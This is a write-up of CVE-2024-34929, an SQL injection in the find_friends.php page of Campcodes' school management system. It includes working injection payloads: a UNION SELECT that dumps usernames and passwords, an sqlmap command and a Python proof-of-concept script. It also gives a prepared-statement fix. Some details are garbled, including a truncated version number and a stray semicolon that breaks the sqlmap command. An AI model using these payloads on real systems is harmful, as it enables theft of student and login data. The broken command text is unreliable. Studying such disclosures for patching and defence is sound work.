CVE-2024-34929 - Exploiting SQL Injection in Campcodes Complete Web-Based School Management System 1. (`/view/find_friends.php?my_index=...`)

In early 2024, a critical security vulnerability was disclosed in the Campcodes Complete Web-Based School Management System 1.. Identified as CVE-2024-34929, this flaw exposes a serious SQL Injection risk through the my_index parameter in the find_friends.php file. In simple terms, an attacker can manipulate database queries and potentially retrieve sensitive information, modify data, or even take control of the web application's backend database.

This write-up will show what the vulnerability looks like, how it can be exploited, and what can be done to stay protected. We'll include a proof-of-concept exploit and explain each step so you can understand how attacks work in the real world.

Product: Campcodes Complete Web-Based School Management System 1.

- Vulnerable File: /view/find_friends.php

Vulnerability Type: SQL Injection (CWE-89)

- CVE: CVE-2024-34929

Original Disclosure:

- Exploit Database #52275
- Patchstack Advisory

How does it work?

The vulnerable parameter, my_index, is directly used as part of a SQL query without sanitization or parameterization. This means an attacker can inject malicious SQL code into the request, affecting the database behind the application.

Vulnerable code example (PHP)

<?php
// ...previous code...
$my_index = $_GET['my_index'];
$sql = "SELECT * FROM students WHERE student_index = '$my_index'";
// ...rest of the code...
?>

Notice how $my_index is plucked straight from user input and dropped inside a SQL string. This is a recipe for trouble.

Step-by-Step Exploit

Let’s walk through exploiting this issue with a proof-of-concept.

You notice or are told about a GET request like this

GET /view/find_friends.php?my_index=1234

Trying basic injection

GET /view/find_friends.php?my_index=1234' OR '1'='1

If you see a change in results, bingo! SQL injection is working.

2. Enumerating Database Data

To extract data step by step, you can use a common trick like UNION SELECT. Here's a sample payload that fetches usernames and passwords (assuming the table and fields are named users, username, and password):

GET /view/find_friends.php?my_index=1234' UNION SELECT 1,username,password,4 FROM users-- -

*In real testing, you may have to guess the number of columns by adjusting the number passed as placeholders until you don’t get an error.*

3. Automating the Attack with SQLMap

SQLMap is a tool that makes exploiting SQL injection easy.

Command

sqlmap -u "http://victim.site/view/find_friends.php?my_index=1234"; --dbs

This will list all databases, proving the site is vulnerable.

For a quick Python script that demonstrates the issue

import requests

base_url = "http://target.site/view/find_friends.php";
payload = "1' OR 1=1-- -"

r = requests.get(base_url, params={"my_index": payload})

if "student_index" in r.text:  # Adjust this string to fit the real output
    print("[+] SQL Injection worked! Here's part of the response:")
    print(r.text[:100])
else:
    print("[-] No luck.")

Example fix (using PDO in PHP)

$my_index = $_GET['my_index'];
$stmt = $pdo->prepare("SELECT * FROM students WHERE student_index = ?");
$stmt->execute([$my_index]);

References

- NVD: CVE-2024-34929
- Exploit-DB #52275
- Patchstack Advisory
- OWASP SQL Injection Cheat Sheet

Conclusion

CVE-2024-34929 is a classic but severe SQL Injection affecting thousands of possible deployments of this school system. Exploiting it is straightforward for attackers and can lead to stolen data, compromised systems, or worse. Always sanitize inputs and use prepared statements — never trust user input.

*Stay safe, keep your code clean, and if you use the Campcodes School Management System, update or patch today!*

Timeline

Published on: 05/23/2024 17:15:29 UTC
Last modified on: 08/01/2024 13:52:26 UTC